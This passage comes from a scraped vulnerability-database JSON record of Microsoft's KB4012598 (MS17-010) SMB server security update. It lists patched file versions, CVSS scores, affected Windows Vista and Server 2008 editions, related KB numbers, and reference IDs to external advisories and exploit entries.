applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,440</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>261,120</td><td>11-Feb-2017</td><td>17:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,152</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>231,936</td><td>11-Feb-2017</td><td>17:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>17:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>99,840</td><td>11-Feb-2017</td><td>17:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>101,376</td><td>11-Feb-2017</td><td>17:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>16:23</td><td>x64</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:41</td><td>x64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>14:40</td><td>x64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>147,968</td><td>11-Feb-2017</td><td>15:43</td><td>x64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>448,512</td><td>11-Feb-2017</td><td>15:48</td><td>x64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>448,000</td><td>11-Feb-2017</td><td>15:44</td><td>x64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>176,128</td><td>03-Aug-2016</td><td>14:40</td><td>x64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>178,176</td><td>11-Feb-2017</td><td>15:43</td><td>x64</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:22</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>299,008</td><td>03-Aug-2016</td><td>16:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>274,432</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>258,048</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>299,008</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>274,432</td><td>11-Feb-2017</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>258,048</td><td>11-Feb-2017</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:17</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:18</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H5\">For all supported x86-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:22</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>299,008</td><td>03-Aug-2016</td><td>16:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>274,432</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>258,048</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>299,008</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>274,432</td><td>11-Feb-2017</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>258,048</td><td>11-Feb-2017</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:17</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:18</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>103,936</td><td>03-Aug-2016</td><td>14:20</td><td>x86</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>103,936</td><td>11-Feb-2017</td><td>15:18</td><td>x86</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>304,640</td><td>11-Feb-2017</td><td>15:22</td><td>x86</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>305,152</td><td>11-Feb-2017</td><td>15:19</td><td>x86</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>146,432</td><td>03-Aug-2016</td><td>14:20</td><td>x86</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>147,968</td><td>11-Feb-2017</td><td>15:18</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink></body></html>", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T17:40:16", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://support.microsoft.com/en-us/help/4012598/", "reporter": "Microsoft", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-01-01T22:51:04", "history": [], "viewCount": 84, "enchantments": {"dependencies": {"modified": "2021-01-01T22:51:04", "references": [{"idList": ["QUALYSBLOG:9A21B2F2CDFD107DF5A18012922E8783"], "type": "qualysblog"}, {"idList": ["THN:F36FBF9A87FE232BFF8E64C4A351F026", "THN:13E6F1103F8D3BD340649FC4B4D6578C"], "type": "thn"}, {"idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:AC5C3889C80508D25E83621B9FB468E5"], "type": "mmpc"}, {"idList": ["MS:CVE-2017-0278", "MS:CVE-2017-0270", "MS:CVE-2017-0274", "MS:CVE-2017-0268", "MS:CVE-2017-0273", "MS:CVE-2017-0269", "MS:CVE-2017-0276", "MS:CVE-2017-0280", "MS:CVE-2017-0271", "MS:CVE-2017-0275"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-01-01T22:51:04", "rev": 2, "value": 2.4, "vector": "NONE"}}, "objectVersion": "1.5", "kb": "KB4012598", "msrc": "MS17-010", "mscve": "", "msplatform": "", "msfamily": "", "msimpact": "", "msseverity": "", "superseeds": [], "parentseeds": [], "msproducts": ["13230", "14113", "13228", "11721", "14210", "11728", "11740", "11733", "11719", "13236", "13233", "14440", "13234", "11708"], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "333f3bd9-9578-fda0-5919-4b8fa39524c3", "f62ed778-6986-d76e-c007-40a28315ffbf", "928d79ba-72eb-762f-39be-122173e95922", "fd3a2888-0af1-3691-5303-bc85b4302e62", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "2b2eeb95-d89c-6614-0db5-88f09133ede6"], "supportAreaPathNodes": [{"id": "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "name": "Windows Server 2008 Datacenter", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "f62ed778-6986-d76e-c007-40a28315ffbf", "name": "Windows Server 2008 Enterprise", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2b2eeb95-d89c-6614-0db5-88f09133ede6", "name": "Windows Server 2008 Foundation", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "name": "Windows Server 2008 for Itanium-Based Systems", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "928d79ba-72eb-762f-39be-122173e95922", "name": "Windows Vista Starter", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "333f3bd9-9578-fda0-5919-4b8fa39524c3", "name": "Windows Server 2008 Standard", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "name": "Windows Server 2008 Web Edition", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}], "primarySupportAreaPath": [{"id": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "name": "Windows Server 2008", "parent": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "tree": [], "type": "productname"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "name": "Windows Servers", "tree": [], "type": "productfamily"}]}, "lastseen": "2021-01-01T22:51:04", "differentElements": ["cvelist", "cvss", "description", "href", "modified", "mscve", "msfamily", "msimpact", "msproducts", "msrc", "msseverity", "parentseeds", "primarySupportAreaPath", "published", "superseeds", "supportAreaPathNodes", "supportAreaPaths"], "edition": 3}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "8c9ec52d901b4038fe4f2f5856958438", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "# MS17-010: Description of the security update for Windows SMB Server: March\n14, 2017\n\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The most\nsevere of the vulnerabilities could allow remote code execution if an attacker\nsends specially crafted messages to a Microsoft Server Message Block 1.0\n(SMBv1) server. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin\nMS17-010](https://technet.microsoft.com/library/security/ms17-010).\n\n## More Information\n\nImportant \n \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](https://technet.microsoft.com/en-us/library/hh825699).\n\n## How to obtain and install the update\n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic\nupdating, this update will be downloaded and installed automatically. For more\ninformation about how to turn on automatic updating, see [Get security updates\nautomatically](https://www.microsoft.com/en-us/safety/pc-\nsecurity/updates.aspx). \n \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update\nCatalog](http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598)\nwebsite. \n\n## More Information\n\n## [ __How to obtain help and support for this security update](javascript:)\n\nHelp for installing updates: [Windows Update:\nFAQ](http://support.microsoft.com/ph/6527) \n \nSecurity solutions for IT professionals: [TechNet Security Support and\nTroubleshooting](https://technet.microsoft.com/security/bb980617.aspx) \n \nHelp for protecting your Windows-based computer from viruses and malware:\n[Microsoft Secure](http://support.microsoft.com/contactus/cu_sc_virsec_master) \n \nLocal support according to your country: [International\nSupport](https://www.microsoft.com/en-us/locale.aspx) \n\nFile Information\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://support.microsoft.com/en-us/help/4012598", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-07-24T22:05:00", "history": [], "viewCount": 84, "enchantments": {"dependencies": {"modified": "2021-07-24T22:05:00", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["CVE-2017-0148"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-24T22:05:00", "rev": 2, "value": 6.4, "vector": "NONE"}}, "objectVersion": "1.5", "kb": "KB4012598", "msrc": "", "mscve": "CVE-2017-0148", "msplatform": "", "msfamily": "ESU", "msimpact": "Remote Code Execution", "msseverity": "Critical", "superseeds": ["KB2508429", "KB923414", "KB971468", "KB982214", "KB3073921", "KB917159", "KB3130896", "KB2536275", "KB957095", "KB3177186", "KB958687"], "parentseeds": ["KB4489880", "KB4520002", "KB4486465", "KB4487019", "KB5003210", "KB5004955", "KB4516026", "KB4601360", "KB4487023", "KB4493471", "KB4534303", "KB4577064", "KB4541506", "KB4499149", "KB5001389", "KB4571730", "KB4592498", "KB4056759", "KB4489876", "KB4565536", "KB5003661", "KB4018466", "KB4537810", "KB4550951", "KB4507452", "KB4580378", "KB4503273", "KB4586807", "KB4530695", "KB4556860", "KB4598288", "KB4512476", "KB5004305", "KB5000844", "KB4561670", "KB4525234"], "msproducts": ["4393", "9318", "9311", "9344", "9316", "10287", "9312"], "supportAreaPaths": [], "supportAreaPathNodes": [], "primarySupportAreaPath": []}, "lastseen": "2021-07-24T22:05:00", "differentElements": ["cvss2", "cvss3", "description", "title"], "edition": 4}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "494b291b96a93232800a3536b407b17b130f4411bc7a28777ce520ddfb663dbf", "type": "mskb", "bulletinFamily": "microsoft", "title": "Security update 2017-03-14", "description": "", 